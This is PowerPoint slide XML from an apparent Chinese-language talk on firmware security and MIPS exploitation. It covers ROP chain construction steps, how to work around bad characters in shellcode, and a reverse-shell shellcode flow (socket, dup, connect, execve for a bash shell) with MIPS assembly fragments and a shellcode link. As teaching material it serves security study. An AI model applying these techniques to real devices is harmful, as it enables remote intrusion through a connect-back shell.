                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器</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s2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器存储的为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sleep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3056255"/>
            <a:ext cx="9144000" cy="1892300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672965" y="2411730"/>
            <a:ext cx="3352800" cy="5524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ROP chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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上一跳返回地址填充成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add $ax, $sp, xxx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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s1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器在上一步预先控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2007235" y="2571115"/>
            <a:ext cx="7036435" cy="2282825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4537075" y="1822450"/>
            <a:ext cx="4373245" cy="546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固件安全概述</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en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is firmware?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="5825490" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>固件指设备内部保存的设备 “驱动程序”，通过固件，操作系统才能按照标准的设备驱动实现特定机器的运行动作。固件是担任着一个系统最基础最底层工作的软件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  在硬件设备中，固件就是硬件设备的灵魂，因为一些硬件设备除了固件以外没有其它软件组成，因此固件也就决定着硬件设备的功能及性能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7829550" y="3421380"/>
            <a:ext cx="736600" cy="736600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918960" y="1186180"/>
            <a:ext cx="1714500" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="7818755" y="2673985"/>
            <a:ext cx="619125" cy="6191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ROP chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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最后一步跳转到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>寄存器存储的栈地址上，执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="172720" y="2764155"/>
            <a:ext cx="8664575" cy="2092960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284470" y="2193925"/>
            <a:ext cx="3020695" cy="5105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altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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调试发现，代码中编码了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>符号，无法使用现成的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5615305" y="1250315"/>
            <a:ext cx="3326765" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需要对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行修改！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6628130" y="2366010"/>
            <a:ext cx="1913890" cy="23323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altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>流程分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数开启 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>套接字</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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数连接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>套接字</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数获取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="3933825"/>
            <a:ext cx="5003800" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>MIPS 指令集 Shellcode 编写技巧</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zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对现有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加以改造</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825"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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://shell-storm.org/shellcode/files/shellcode-860.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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4413250" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socket(AF_INET,SOCK_STREAM,-1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="1753235"/>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li $t7, 0xFFFFFFFD</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nor $a0, $t7, $zero		# a0 = 2</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nor $a1, $t7, $zero		# a1 = 2</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slti $a2, $zero, -1		# a2 = -1</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li $v0, 4183</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syscall 0x40404		# socket(AF_INET,SOCK_STREAM,-1);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2640000">
            <a:off x="5072380" y="2141855"/>
            <a:ext cx="952500" cy="952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6163945" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connect(sock,(struct sockaddr *)&amp;server,sizeof(server));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
